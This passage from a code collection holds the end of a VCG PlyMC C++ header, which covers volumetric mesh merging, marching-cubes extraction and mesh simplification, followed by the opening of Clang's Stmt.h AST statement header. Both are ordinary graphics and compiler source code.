if(p.VerboseLevel>1) B.SlicedPPM(shortname.c_str(),SFormat("%02is",vstp++),p.SliceNum );
// if(VerboseLevel>1) B.SlicedPPMQ(shortname,SFormat("%02is",vstp),SliceNum );
}
}
if(p.SmoothNum>0)
{
Volume <Voxelf> SM;
SM.Init(VV);
SM.CopySmooth(B,1,p.QualitySmoothAbs);
B=SM;
if(p.VerboseLevel>1) B.SlicedPPM(shortname.c_str(),SFormat("%02isf",vstp++),p.SliceNum );
}
VV.Merge(B);
if(p.VerboseLevel>0) VV.SlicedPPMQ(std::string("merge_").c_str(),shortname.c_str(),p.SliceNum );
return true;
}
void GetSubVolumeTag(Point3i div,Point3i pos,std::string &subtag)
{
char buf[32];
if (div[0]<= 10 && div[1]<= 10 && div[2]<= 10 ) sprintf(buf,"_%01d%01d%01d",pos[0],pos[1],pos[2]);
else if(div[0]<= 100 && div[1]<= 100 && div[2]<= 100 ) sprintf(buf,"_%02d%02d%02d",pos[0],pos[1],pos[2]);
else sprintf(buf,"_%03d%03d%03d",pos[0],pos[1],pos[2]);
subtag=buf;
}
void ProcessCells(CallBackPosTotal *cb=0)
{
unsigned long long startTick=osg::Timer::instance()->tick();
printf("bbox scanning...\n"); fflush(stdout);
Matrix44f Id; Id.SetIdentity();
MP.InitBBox();
printf("Completed BBox Scanning \n");
Box3f fullb = MP.fullBB();
assert (!fullb.IsNull());
assert (!fullb.IsEmpty());
// Calcolo gridsize
Point3i gridsize;
Point3f voxdim;
fullb.Offset(fullb.Diag() * 0.1 );
voxdim = fullb.max - fullb.min;
int TotAdd=0,TotMC=0,TotSav=0;
// if kcell==0 the number of cells is computed starting from required voxel size;
__int64 cells;
if(p.NCell>0) cells = (__int64)(p.NCell)*(__int64)(1000);
else cells = (__int64)(voxdim[0]/p.VoxSize) * (__int64)(voxdim[1]/p.VoxSize) *(__int64)(voxdim[2]/p.VoxSize) ;
Box3i globalBox;
{
Volume<Voxelf> B; // local to this small block
Box3f fullbf; fullbf.Import(fullb);
B.Init(cells,fullbf,p.IDiv,p.IPosS);
B.Dump(stdout);
if(p.WideSize>0) p.WideNum=p.WideSize/B.voxel.Norm();
globalBox=B.SubPart;
// Now the volume has been determined; the quality threshold in absolute units can be computed
if(p.QualitySmoothAbs==0)
p.QualitySmoothAbs= p.QualitySmoothVox * B.voxel.Norm();
}
bool res=false;
/*vVV.resize(p.IDiv[0]);
for(int i=0; i<vVV.size(); i++){
vVV[i].resize(p.IDiv[1]);
for(int j=0; j<vVV[i].size(); j++)
vVV[i][j].resize(p.IDiv[2]);
}*/
//#pragma omp parallel for
for(int xx=p.IPosS[0];xx<=p.IPosE[0];++xx)
for(int yy=p.IPosS[1];yy<=p.IPosE[1];++yy)
for(int zz=p.IPosS[2];zz<=p.IPosE[2];++zz)
if((zz+(yy*p.IDiv[2])+(xx*p.IDiv[2]*p.IDiv[1])) >=
(p.IPosB[2]+(p.IPosB[1]*p.IDiv[2])+(p.IPosB[0]*p.IDiv[2]*p.IDiv[1]))) // skip until IPos >= IPosB
{
printf("----------- SubBlock %2i %2i %2i ----------\n",xx,yy,zz);
//Volume<Voxelf> B;
Volume<Voxelf> VV;// =vVV[xx][yy][zz];
int t0=clock();
Box3f fullbf; fullbf.Import(fullb);
//VV.DeltaVoxelSafe=1;
Point3i IPos;
IPos[0]=xx;
IPos[1]=yy;
IPos[2]=zz;
VV.Init(cells,fullbf,p.IDiv,IPos);
printf("\n\n --------------- Allocated subcells. %i\n",VV.Allocated());
std::string filename=p.basename;
if(p.IDiv!=Point3i(1,1,1))
{
std::string subvoltag;
VV.GetSubVolumeTag(subvoltag);
filename+=subvoltag;
}
/********** Grande loop di scansione di tutte le mesh *********/
for(int i=0;i<MP.size();++i)
{
Box3f bbb= MP.bb(i);
/**********************/
cb((i+1),MP.size(),startTick,"Vol");
/**********************/
// if bbox of mesh #i is part of the subblock, then process it
if(bbb.Collide(VV.SubBoxSafe))
{
SMesh *sm;
if(!MP.Find(i,sm) )
{
res = InitMesh(VV,*sm,MP.MeshName(i).c_str(),MP.Tr(i));
if(!res)
{
printf("Failed Init of mesh %s",MP.MeshName(i).c_str());
//break;
}
}
res |= AddMeshToVolumeM(VV,*sm, MP.MeshName(i),MP.W(i));
}
}
/* for(int k=VV.SubPart.min[2];k<VV.SubPart.max[2];++k)
for(int j=VV.SubPart.min[1];j<VV.SubPart.max[1];++j)
for(int i=VV.SubPart.min[0];i<VV.SubPart.max[0];++i){
float fv=VV.V(i,j,k).V();
if(fv != 0)
printf("aa %f---%d %d %d\n",fv,k,j,i);
}*/
//B.Normalize(1);
printf("End Scanning\n");
if(p.OffsetFlag)
{
VV.Offset(p.OffsetThr);
if (p.VerboseLevel>0)
{
VV.SlicedPPM("finaloff","__",p.SliceNum);
VV.SlicedPPMQ("finaloff","__",p.SliceNum);
}
}
//if(p.VerboseLevel>1) VV.SlicedPPM(filename.c_str(),SFormat("_%02im",i),p.SliceNum );
for(int i=0;i<p.RefillNum;++i)
{
//VV.Refill(3,6);
if(p.VerboseLevel>1) VV.SlicedPPM(filename.c_str(),SFormat("_%02imsr",i),p.SliceNum );
//if(VerboseLevel>1) VV.SlicedPPMQ(filename,SFormat("_%02ips",i++),SliceNum );
}
for(int i=0;i<p.SmoothNum;++i)
{
Volume <Voxelf> SM;
SM.Init(VV);
printf("%2i/%2i: ",i,p.SmoothNum);
SM.CopySmooth(VV,1,p.QualitySmoothAbs);
VV=SM;
// VV.Refill(3,6);
if(p.VerboseLevel>1) VV.SlicedPPM(filename.c_str(),SFormat("_%02ims",i),p.SliceNum );
}
int t1=clock(); //--------
TotAdd+=t1-t0;
printf("Extracting surface...\r");
if (p.VerboseLevel>0)
{
VV.SlicedPPM("final","__",p.SliceNum);
VV.SlicedPPMQ("final","__",p.SliceNum);
}
std::string fn="test";
if(1){//VV.div!=Point3i(1,1,1)) {
std::string subvoltag;
VV.GetSubVolumeTag(subvoltag);
fn+=subvoltag;
}
std::string datname=fn;
std::string rawname=fn;
rawname+=".raw";
VV.Write(rawname,0,0);
//MCMesh me;
//
}
}
Box3i getBBoxFromFile(std::string filename){
FILE *fp;
fp=fopen(filename.c_str(),"rb");
if(!fp)
{
printf("Error: unable ro open output volume file '%s'\n",filename.c_str());
exit(-1);
}
_int64 cells; Box3<float> bb; Point3i div; Point3i pos;
Point3i sz;
fread(&cells,sizeof(_int64),1,fp);
float bbtmp[6];
fread(&bbtmp[0],sizeof(float),6,fp);
for(int i=0;i<3; i++)
bb.min[i]=bbtmp[i];
for(int i=0;i<3; i++)
bb.max[i]=bbtmp[i+3];
int pttmp[3];
fread(&pttmp[0],sizeof(int),3,fp);
for(int i=0;i<3; i++)
div[i]=pttmp[i];
fread(&pttmp[0],sizeof(int),3,fp);
for(int i=0;i<3; i++){
pos[i]=pttmp[i];
}
fread(&pttmp[0],sizeof(int),3,fp);
for(int i=0;i<3; i++){
sz[i]=pttmp[i];
}
fclose(fp);
Box3i SubPart,SubPartSafe;
// Setting the subpart under analisys
for(int k=0;k<3;++k)
{
SubPart.min[k]= pos[k]*sz[k]/div[k];
SubPart.max[k]=(pos[k]+1)*sz[k]/div[k];
// SubBox.min[k]= bbox.min[k]+SubPart.min[k]*voxel[k];
// SubBox.max[k]= bbox.min[k]+SubPart.max[k]*voxel[k];
}
// Setting the Safe Subpart under analisys
SubPartSafe=SubPart;
for(int k=0;k<3;++k)
{
SubPartSafe.min[k] -= Volume<Voxelf>::BLOCKSIDE();;
SubPartSafe.max[k] += Volume<Voxelf>::BLOCKSIDE();;
if( SubPartSafe.min[k]< 0 ) SubPartSafe.min[k] = 0;
if( SubPartSafe.max[k]> sz[k] ) SubPartSafe.max[k] = sz[k];
// SubBoxSafe.min[k]= bbox.min[k]+SubPartSafe.min[k]*voxel[k];
// SubBoxSafe.max[k]= bbox.min[k]+SubPartSafe.max[k]*voxel[k];
}
return SubPartSafe;
}
void ProcessNormalize(CallBackPosTotal *cb=0)
{
int cnt=0;
std::vector< std::vector<std::vector<Volume<Voxelf> > > >vVV;
vVV.resize(p.IDiv[0]);
for(int i=0; i<vVV.size(); i++){
vVV[i].resize(p.IDiv[1]);
for(int j=0; j<vVV[i].size(); j++)
vVV[i][j].resize(p.IDiv[2]);
}
for(int xx=p.IPosS[0];xx<=p.IPosE[0];++xx)
for(int yy=p.IPosS[1];yy<=p.IPosE[1];++yy)
for(int zz=p.IPosS[2];zz<=p.IPosE[2];++zz)
if((zz+(yy*p.IDiv[2])+(xx*p.IDiv[2]*p.IDiv[1])) >=
(p.IPosB[2]+(p.IPosB[1]*p.IDiv[2])+(p.IPosB[0]*p.IDiv[2]*p.IDiv[1]))) // skip until IPos >= IPosB
{
std::string fn="test";
if(1){//VV.div!=Point3i(1,1,1)) {
std::string subvoltag;
Point3i pos(xx,yy,zz);
GetSubVolumeTag(p.IDiv,pos,subvoltag);
fn+=subvoltag;
}
std::string datname=fn;
std::string rawname=fn;
rawname+=".raw";
Box3i ibox;
printf("Loading %s\n ",rawname.c_str());
vVV[xx][yy][zz].Read(rawname);
}
printf("Done Loading\n");
//#pragma omp parallel for
for(int xx=p.IPosS[0];xx<=p.IPosE[0];++xx)
for(int yy=p.IPosS[1];yy<=p.IPosE[1];++yy)
for(int zz=p.IPosS[2];zz<=p.IPosE[2];++zz)
if((zz+(yy*p.IDiv[2])+(xx*p.IDiv[2]*p.IDiv[1])) >=
(p.IPosB[2]+(p.IPosB[1]*p.IDiv[2])+(p.IPosB[0]*p.IDiv[2]*p.IDiv[1]))) // skip until IPos >= IPosB
{
std::string fn="test";
Volume<Voxelf> &VV= vVV[xx][yy][zz];
if(1){//VV.div!=Point3i(1,1,1)) {
std::string subvoltag;
Point3i pos(xx,yy,zz);
GetSubVolumeTag(p.IDiv,pos,subvoltag);
fn+=subvoltag;
}
std::string datname=fn;
std::string rawname=fn;
rawname+=".raw";
Box3i ibox;
// VV.Read(rawname);
bool madeChange=false;
for(int xxx=p.IPosS[0];xxx<=p.IPosE[0];++xxx)
for(int yyy=p.IPosS[1];yyy<=p.IPosE[1];++yyy){
if(xxx==xx && yyy==yy)
continue;
std::string fn_comapre="test";
if(1){//VV.div!=Point3i(1,1,1)) {
std::string subvoltag_compare;
Point3i pos(xxx,yyy,zz);
GetSubVolumeTag(p.IDiv,pos,subvoltag_compare);
fn_comapre+=subvoltag_compare;
fn_comapre+=".raw";
}
Volume<Voxelf> &VV_compare=vVV[xxx][yyy][zz];;
Box3i SubPartSafeCompare=VV_compare.SubPartSafe;
// Box3i SubPartSafeCompare=getBBoxFromFile(fn_comapre);
if(!SubPartSafeCompare.Collide(VV.SubPartSafe))
continue;
// VV_compare.Read(fn_comapre);
ibox.min[0] = std::max(SubPartSafeCompare.min[0],VV.SubPartSafe.min[0]);
ibox.min[1] = std::max(SubPartSafeCompare.min[1],VV.SubPartSafe.min[1]);
ibox.min[2] = std::max(SubPartSafeCompare.min[2],VV.SubPartSafe.min[2]);
ibox.max[0] = std::min(SubPartSafeCompare.max[0],VV.SubPartSafe.max[0]);
ibox.max[1] = std::min(SubPartSafeCompare.max[1],VV.SubPartSafe.max[1]);
ibox.max[2] = std::min(SubPartSafeCompare.max[2],VV.SubPartSafe.max[2]);
// ibox=globalBox;
/* printf("%d %d %d -- %d %d %d\n",ibox.min[0],ibox.min[1],ibox.min[2],
ibox.max[0],ibox.max[1],ibox.max[2]);
printf("A %d %d %d -- %d %d %d\n",SubPartSafe.min[0],SubPartSafe.min[1],SubPartSafe.min[2],
SubPartSafe.max[0],SubPartSafe.max[1],SubPartSafe.max[2]);
printf("B %d %d %d -- %d %d %d\n",VV.SubPartSafe.min[0],VV.SubPartSafe.min[1],VV.SubPartSafe.min[2],
VV.SubPartSafe.max[0],VV.SubPartSafe.max[1],VV.SubPartSafe.max[2]);*/
for(int xxxx=ibox.min[0];xxxx<=ibox.max[0];++xxxx)
for(int yyyy=ibox.min[1];yyyy<=ibox.max[1];++yyyy)
for(int zzzz=ibox.min[2];zzzz<=ibox.max[2];++zzzz){
// printf("%d %d %d\n",xxxx,yyyy,zzzz);
if(VV.Val(xxxx,yyyy,zzzz) == 0.0)
continue;
if(VV_compare.Val(xxxx,yyyy,zzzz)!=VV.Val(xxxx,yyyy,zzzz)){
#pragma omp critical
{
// printf("%f %f\n",VV_compare.Val(xxxx,yyyy,zzzz),VV.Val(xxxx,yyyy,zzzz));
if(VV_compare.Val(xxxx,yyyy,zzzz) == 1000.000)
;//VV_compare.V(xxxx,yyyy,zzzz).Set(VV.V(xxxx,yyyy,zzzz));
else if(VV.Val(xxxx,yyyy,zzzz) == 1000.000)
VV.V(xxxx,yyyy,zzzz).Set(VV_compare.V(xxxx,yyyy,zzzz));
else{
VV_compare.V(xxxx,yyyy,zzzz).Blend(VV.V(xxxx,yyyy,zzzz),0.5);
VV.V(xxxx,yyyy,zzzz).Set( VV_compare.V(xxxx,yyyy,zzzz));
}
madeChange=true;
}
}
// vVV[xxx][yyy][zz].V(xxxx,yyyy,zzzz).Set(VV.V(xxxx,yyyy,zzzz));
// VV.V(xxxx,yyyy,zzzz).SetB(false);
}
}
/* std::string filename="final";
if(p.IDiv!=Point3i(1,1,1))
{
std::string subvoltag;
VV.GetSubVolumeTag(subvoltag);
filename+=subvoltag;
}
VV.SlicedPPM(filename.c_str(),"__",1);
VV.SlicedPPMQ(filename.c_str(),"__",1);
VV.Dump(stdout);*/
if(madeChange)
VV.Write(rawname,0,0);
printf("----------- Equalizing corner SubBlock %2i %2i %2i ----------\n",xx,yy,zz);
//Volume<Voxelf> B;
}
//#pragma omp parallel for
}
void ProcessMC(CallBackPosTotal *cb=0)
{
int TotAdd=0,TotMC=0,TotSav=0;
for(int xx=p.IPosS[0];xx<=p.IPosE[0];++xx)
for(int yy=p.IPosS[1];yy<=p.IPosE[1];++yy)
for(int zz=p.IPosS[2];zz<=p.IPosE[2];++zz)
if((zz+(yy*p.IDiv[2])+(xx*p.IDiv[2]*p.IDiv[1])) >=
(p.IPosB[2]+(p.IPosB[1]*p.IDiv[2])+(p.IPosB[0]*p.IDiv[2]*p.IDiv[1]))) // skip until IPos >= IPosB
{
//Volume<Voxelf> &VV =vVV[xx][yy][zz];
Volume<Voxelf> VV;
std::string fn="test";
if(1){//VV.div!=Point3i(1,1,1)) {
std::string subvoltag;
Point3i pos(xx,yy,zz);
GetSubVolumeTag(p.IDiv,pos,subvoltag);
fn+=subvoltag;
}
std::string datname=fn;
std::string rawname=fn;
rawname+=".raw";
VV.Read(rawname);
std::string filename=p.basename;
if(p.IDiv!=Point3i(1,1,1))
{
std::string subvoltag;
VV.GetSubVolumeTag(subvoltag);
filename+=subvoltag;
}
bool res=true;
MCMesh me;
if(res)
{
typedef vcg::tri::TrivialWalker<MCMesh, Volume <Voxelf> > Walker;
typedef vcg::tri::MarchingCubes<MCMesh, Walker> MarchingCubes;
//typedef vcg::tri::ExtendedMarchingCubes<MCMesh, Walker> ExtendedMarchingCubes;
Walker walker;
MarchingCubes mc(me, walker);
Box3i currentSubBox=VV.SubPartSafe;
Point3i currentSubBoxRes=VV.ssz;
/**********************/
cb(50,50,0,"Step 2: Marching Cube...");
/**********************/
walker.BuildMesh(me,VV,mc,currentSubBox,currentSubBoxRes);
typename MCMesh::VertexIterator vi;
Box3f bbb; bbb.Import(VV.SubPart);
for(vi=me.vert.begin();vi!=me.vert.end();++vi)
{
if(!bbb.IsIn((*vi).P()))
vcg::tri::Allocator< MCMesh >::DeleteVertex(me,*vi);
VV.DeInterize((*vi).P());
}
typename MCMesh::FaceIterator fi;
for (fi = me.face.begin(); fi != me.face.end(); ++fi)
{
if((*fi).V(0)->IsD() || (*fi).V(1)->IsD() || (*fi).V(2)->IsD() )
vcg::tri::Allocator< MCMesh >::DeleteFace(me,*fi);
else std::swap((*fi).V1(0), (*fi).V2(0));
}
int t2=clock(); //--------
// TotMC+=t2-t1;
if(me.vn >0 || me.fn >0)
{
p.OutNameVec.push_back(filename+std::string(".ply"));
int saveMask=0;
if(p.MergeColor) saveMask |= tri::io::Mask::IOM_VERTCOLOR ;
tri::io::ExporterPLY<MCMesh>::Save(me,p.OutNameVec.back().c_str(),saveMask);
if(p.SimplificationFlag)
{
/**********************/
cb(50,50,0,"Step 3: Simplify mesh...");
/**********************/
p.OutNameSimpVec.push_back(filename+std::string(".d.ply"));
me.face.EnableVFAdjacency();
MCSimplify<MCMesh>(me, VV.voxel[0]/4.0);
tri::Allocator<MCMesh>::CompactFaceVector(me);
me.face.EnableFFAdjacency();
tri::Clean<MCMesh>::RemoveTVertexByFlip(me,20,true);
tri::Clean<MCMesh>::RemoveFaceFoldByFlip(me);
tri::io::ExporterPLY<MCMesh>::Save(me,p.OutNameSimpVec.back().c_str(),saveMask);
}
}
int t3=clock(); //--------
TotSav+=t3-t2;
}
printf("Mesh Saved '%s': %8d vertices, %8d faces \n",(filename+std::string(".ply")).c_str(),me.vn,me.fn);
printf("Adding Meshes %8i\n",TotAdd);
printf("MC %8i\n",TotMC);
printf("Saving %8i\n",TotSav);
printf("Total %8i\n",TotAdd+TotMC+TotSav);
}
else
{
printf("----------- skipping SubBlock %2i %2i %2i ----------\n",xx,yy,zz);
}
}
}; //end PlyMC class
template < class MeshType>
class PlyMCTriEdgeCollapse: public MCTriEdgeCollapse< MeshType, PlyMCTriEdgeCollapse<MeshType> > {
public:
typedef MCTriEdgeCollapse< MeshType, PlyMCTriEdgeCollapse > MCTEC;
typedef typename MeshType::VertexType::EdgeType EdgeType;
inline PlyMCTriEdgeCollapse( const EdgeType &p, int i) :MCTEC(p,i){}
};
template< class MeshType>
void MCSimplify( MeshType &m, float absoluteError, bool preserveBB, vcg::CallBackPos *cb)
{
typedef PlyMCTriEdgeCollapse<MeshType> MyColl;
tri::UpdateBounding<MeshType>::Box(m);
tri::UpdateTopology<MeshType>::VertexFace(m);
vcg::LocalOptimization<MeshType> DeciSession(m);
MyColl::bb()=m.bbox;
MyColl::preserveBBox()=preserveBB;
if(absoluteError==0)
{
// guess the mc side.
// In a MC mesh the vertices are on the egdes of the cells. and the edges are (mostly) on face of the cells.
// If you have 2 vert over the same face xy they share z
std::vector<float> ZSet;
typename MeshType::FaceIterator fi;
for(fi = m.face.begin();fi!=m.face.end();++fi)
if(!(*fi).IsD())
{
Point3f v0=(*fi).V(0)->P();
Point3f v1=(*fi).V(1)->P();
Point3f v2=(*fi).V(2)->P();
if(v0[2]==v1[2] && v0[1]!=v1[1] && v0[0]!=v1[0]) ZSet.push_back(v0[2]);
if(v0[2]==v2[2] && v0[1]!=v1[1] && v2[0]!=v2[0]) ZSet.push_back(v0[2]);
if(v1[2]==v2[2] && v1[1]!=v1[1] && v2[0]!=v2[0]) ZSet.push_back(v0[2]);
if(ZSet.size()>100) break;
}
std::sort(ZSet.begin(),ZSet.end());
std::vector<float>::iterator lastV = std::unique(ZSet.begin(),ZSet.end());
ZSet.resize(lastV-ZSet.begin());
float Delta=0;
for(size_t i = 0; i< ZSet.size()-1;++i)
{
Delta = std::max(ZSet[i+1]-ZSet[i],Delta);
//qDebug("%f",Delta);
}
absoluteError= Delta/4.0f;
}
//qDebug("Simplifying at absoluteError=%f",absoluteError);
float TargetError = absoluteError;
char buf[1024];
DeciSession.template Init< MyColl > ();
MyColl::areaThr()=TargetError*TargetError;
DeciSession.SetTimeBudget(1.0f);
if(TargetError < std::numeric_limits<float>::max() ) DeciSession.SetTargetMetric(TargetError);
while(DeciSession.DoOptimization() && DeciSession.currMetric < TargetError)
{
sprintf(buf,"Simplyfing %7i err %9g \r",m.fn,DeciSession.currMetric);
if (cb) cb(int(100.0f*DeciSession.currMetric/TargetError),buf);
}
}
} // end namespace tri
} // end namespace vcg
#endif
|
Stmt.h | //===- Stmt.h - Classes for representing statements -------------*- C++ -*-===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
// And has the following additional copyright:
//
// (C) Copyright 2016-2020 Xilinx, Inc.
// All Rights Reserved.
//
//===----------------------------------------------------------------------===//
//
// This file defines the Stmt interface and subclasses.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_AST_STMT_H
#define LLVM_CLANG_AST_STMT_H
#include "clang/AST/DeclGroup.h"
#include "clang/AST/StmtIterator.h"
#include "clang/Basic/CapturedStmt.h"
#include "clang/Basic/IdentifierTable.h"
#include "clang/Basic/LLVM.h"
#include "clang/Basic/SourceLocation.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/PointerIntPair.h"
#include "llvm/ADT/StringRef.h"
#include "llvm/ADT/iterator.h"
#include "llvm/ADT/iterator_range.h"
#include "llvm/Support/Casting.h"
#include "llvm/Support/Compiler.h"
#include "llvm/Support/ErrorHandling.h"
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <iterator>
#include <string>
namespace llvm {
class FoldingSetNodeID;
} // namespace llvm
namespace clang {
class ASTContext;
class Attr;
class CapturedDecl;
class Decl;
class Expr;
class LabelDecl;
class ODRHash;
class PrinterHelper;
struct PrintingPolicy;
class RecordDecl;
class SourceManager;
class StringLiteral;
class Token;
class VarDecl;
//===----------------------------------------------------------------------===//
// AST classes for statements.
//===----------------------------------------------------------------------===//
/// Stmt - This represents one statement.
///
class alignas(void *) Stmt {
public:
enum StmtClass {
NoStmtClass = 0,
#define STMT(CLASS, PARENT) CLASS##Class,
#define STMT_RANGE(BASE, FIRST, LAST) \
first##BASE##Constant=FIRST##Class, last##BASE##Constant=LAST##Class,
#define LAST_STMT_RANGE(BASE, FIRST, LAST) \
first##BASE##Constant=FIRST##Class, last##BASE##Constant=LAST##Class
#define ABSTRACT_STMT(STMT)
#include "clang/AST/StmtNodes.inc"
};
// Make vanilla 'new' and 'delete' illegal for Stmts.
protected:
friend class ASTStmtReader;
friend class ASTStmtWriter;
void *operator new(size_t bytes) noexcept {
llvm_unreachable("Stmts cannot be allocated with regular 'new'.");
}
void operator delete(void *data) noexcept {
llvm_unreachable("Stmts cannot be released with regular 'delete'.");
}
class StmtBitfields {
friend class Stmt;
/// \brief The statement class.
unsigned sClass : 8;
};
enum { NumStmtBits = 8 };
class CompoundStmtBitfields {
friend class CompoundStmt;
unsigned : NumStmtBits;
unsigned NumStmts : 32 - NumStmtBits;
};
class IfStmtBitfields {
friend class IfStmt;
unsigned : NumStmtBits;
unsigned IsConstexpr : 1;
};
class ExprBitfields {
friend class ASTStmtReader; // deserialization
friend class AtomicExpr; // ctor
friend class BlockDeclRefExpr; // ctor
friend class CallExpr; // ctor
friend class CXXConstructExpr; // ctor
friend class CXXDependentScopeMemberExpr; // ctor
friend class CXXNewExpr; // ctor
friend class CXXUnresolvedConstructExpr; // ctor
friend class DeclRefExpr; // computeDependence
friend class DependentScopeDeclRefExpr; // ctor
friend class DesignatedInitExpr; // ctor
friend class Expr;
friend class InitListExpr; // ctor
friend class ObjCArrayLiteral; // ctor
friend class ObjCDictionaryLiteral; // ctor
friend class ObjCMessageExpr; // ctor
friend class OffsetOfExpr; // ctor
friend class OpaqueValueExpr; // ctor
friend class OverloadExpr; // ctor
friend class ParenListExpr; // ctor
friend class PseudoObjectExpr; // ctor
friend class ShuffleVectorExpr; // ctor
unsigned : NumStmtBits;
unsigned ValueKind : 2;
unsigned ObjectKind : 3;
unsigned TypeDependent : 1;
unsigned ValueDependent : 1;
unsigned InstantiationDependent : 1;
unsigned ContainsUnexpandedParameterPack : 1;
};
enum { NumExprBits = 17 };
class CharacterLiteralBitfields {
friend class CharacterLiteral;
unsigned : NumExprBits;
unsigned Kind : 3;
};
enum APFloatSemantics {
IEEEhalf,
IEEEsingle,
IEEEdouble,
x87DoubleExtended,
IEEEquad,
PPCDoubleDouble
};
class FloatingLiteralBitfields {
friend class FloatingLiteral;
unsigned : NumExprBits;
unsigned Semantics : 3; // Provides semantics for APFloat construction
unsigned IsExact : 1;
};
class UnaryExprOrTypeTraitExprBitfields {
friend class UnaryExprOrTypeTraitExpr;
unsigned : NumExprBits;
unsigned Kind : 3;
unsigned IsType : 1; // true if operand is a type, false if an expression.
};
class DeclRefExprBitfields {
friend class ASTStmtReader; // deserialization
friend class DeclRefExpr;
unsigned : NumExprBits;
unsigned HasQualifier : 1;
unsigned HasTemplateKWAndArgsInfo : 1;
unsigned HasFoundDecl : 1;
unsigned HadMultipleCandidates : 1;
unsigned RefersToEnclosingVariableOrCapture : 1;
};
class CastExprBitfields {
friend class CastExpr;
unsigned : NumExprBits;
unsigned Kind : 6;
unsigned BasePathSize : 32 - 6 - NumExprBits;
};
class CallExprBitfields {
friend class CallExpr;
unsigned : NumExprBits;
unsigned NumPreArgs : 1;
};
class ExprWithCleanupsBitfields {
friend class ASTStmtReader; // deserialization
friend class ExprWithCleanups;
unsigned : NumExprBits;
// When false, it must not have side effects.
unsigned CleanupsHaveSideEffects : 1;
unsigned NumObjects : 32 - 1 - NumExprBits;
};
class PseudoObjectExprBitfields {
friend class ASTStmtReader; // deserialization
friend class PseudoObjectExpr;
unsigned : NumExprBits;
// These don't need to be particularly wide, because they're
// strictly limited by the forms of expressions we permit.
unsigned NumSubExprs : 8;
unsigned ResultIndex : 32 - 8 - NumExprBits;
};
class ObjCIndirectCopyRestoreExprBitfields {
friend class ObjCIndirectCopyRestoreExpr;
unsigned : NumExprBits;
unsigned ShouldCopy : 1;
};
class InitListExprBitfields {
friend class InitListExpr;
unsigned : NumExprBits;
/// Whether this initializer list originally had a GNU array-range
/// designator in it. This is a temporary marker used by CodeGen.
unsigned HadArrayRangeDesignator : 1;
};
class TypeTraitExprBitfields {
friend class ASTStmtReader;
friend class ASTStmtWriter;
friend class TypeTraitExpr;
unsigned : NumExprBits;
/// \brief The kind of type trait, which is a value of a TypeTrait enumerator.
unsigned Kind : 8;
/// \brief If this expression is not value-dependent, this indicates whether
/// the trait evaluated true or false.
unsigned Value : 1;
/// \brief The number of arguments to this type trait.
unsigned NumArgs : 32 - 8 - 1 - NumExprBits;
};
class CoawaitExprBitfields {
friend class CoawaitExpr;
unsigned : NumExprBits;
unsigned IsImplicit : 1;
};
union {
StmtBitfields StmtBits;
CompoundStmtBitfields CompoundStmtBits;
IfStmtBitfields IfStmtBits;
ExprBitfields ExprBits;
CharacterLiteralBitfields CharacterLiteralBits;
FloatingLiteralBitfields FloatingLiteralBits;
UnaryExprOrTypeTraitExprBitfields UnaryExprOrTypeTraitExprBits;
DeclRefExprBitfields DeclRefExprBits;
CastExprBitfields CastExprBits;
CallExprBitfields CallExprBits;
ExprWithCleanupsBitfields ExprWithCleanupsBits;
PseudoObjectExprBitfields PseudoObjectExprBits;
ObjCIndirectCopyRestoreExprBitfields ObjCIndirectCopyRestoreExprBits;
InitListExprBitfields InitListExprBits;
TypeTraitExprBitfields TypeTraitExprBits;
CoawaitExprBitfields CoawaitBits;
};
public:
// Only allow allocation of Stmts using the allocator in ASTContext
// or by doing a placement new.
void* operator new(size_t bytes, const ASTContext& C,
unsigned alignment = 8);
void* operator new(size_t bytes, const ASTContext* C,
unsigned alignment = 8) {
return operator new(bytes, *C, alignment);
}
void *operator new(size_t bytes, void *mem) noexcept { return mem; }
void operator delete(void *, const ASTContext &, unsigned) noexcept {}
void operator delete(void *, const ASTContext *, unsigned) noexcept {}
void operator delete(void *, size_t) noexcept {}
void operator delete(void *, void *) noexcept {}
public:
/// \brief A placeholder type used to construct an empty shell of a
/// type, that will be filled in later (e.g., by some
/// de-serialization).
struct EmptyShell {};
protected:
/// Iterator for iterating over Stmt * arrays that contain only Expr *
///
/// This is needed because AST nodes use Stmt* arrays to store
/// references to children (to be compatible with StmtIterator).
struct ExprIterator
: llvm::iterator_adaptor_base<ExprIterator, Stmt **,
std::random_access_iterator_tag, Expr *> {
ExprIterator() : iterator_adaptor_base(nullptr) {}
ExprIterator(Stmt **I) : iterator_adaptor_base(I) {}
reference operator*() const {
assert((*I)->getStmtClass() >= firstExprConstant &&
(*I)->getStmtClass() <= lastExprConstant);
return *reinterpret_cast<Expr **>(I);
}
};
/// Const iterator for iterating over Stmt * arrays that contain only Expr *
struct ConstExprIterator
: llvm::iterator_adaptor_base<ConstExprIterator, const Stmt *const *,
std::random_access_iterator_tag,
const Expr *const> {
ConstExprIterator() : iterator_adaptor_base(nullptr) {}
ConstExprIterator(const Stmt *const *I) : iterator_adaptor_base(I) {}
reference operator*() const {
assert((*I)->getStmtClass() >= firstExprConstant &&
(*I)->getStmtClass() <= lastExprConstant);
return *reinterpret_cast<const Expr *const *>(I);
}
};
private:
/// \brief Whether statistic collection is enabled.
static bool StatisticsEnabled;
protected:
/// \brief Construct an empty statement.
explicit Stmt(StmtClass SC, EmptyShell) : Stmt(SC) {}
public:
Stmt(StmtClass SC) {
static_assert(sizeof(*this) == sizeof(void *),
"changing bitfields changed sizeof(Stmt)");
static_assert(sizeof(*this) % alignof(void *) == 0,
"Insufficient alignment!");
StmtBits.sClass = SC;
if (StatisticsEnabled) Stmt::addStmtClass(SC);
}
StmtClass getStmtClass() const {
return static_cast<StmtClass>(StmtBits.sClass);
}
const char *getStmtClassName() const;
/// SourceLocation tokens are not useful in isolation - they are low level
/// value objects created/interpreted by SourceManager. We assume AST
/// clients will have a pointer to the respective SourceManager.
SourceRange getSourceRange() const LLVM_READONLY;
SourceLocation getLocStart() const LLVM_READONLY;
SourceLocation getLocEnd() const LLVM_READONLY;
// global temp stats (until we have a per-module visitor)
static void addStmtClass(const StmtClass s);
static void EnableStatistics();
static void PrintStats();
/// \brief Dumps the specified AST fragment and all subtrees to
/// \c llvm::errs().
void dump() const;
void dump(SourceManager &SM) const;
void dump(raw_ostream &OS, SourceManager &SM) const;
void dump(raw_ostream &OS) const;
/// dumpColor - same as dump(), but forces color highlighting.
void dumpColor() const;
